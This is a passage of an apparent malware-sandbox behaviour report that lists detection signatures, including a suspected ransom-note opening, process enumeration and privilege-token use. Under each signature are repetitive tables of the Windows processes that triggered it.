Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A
N/A N/A C:\Users\Admin\Downloads\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f\fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
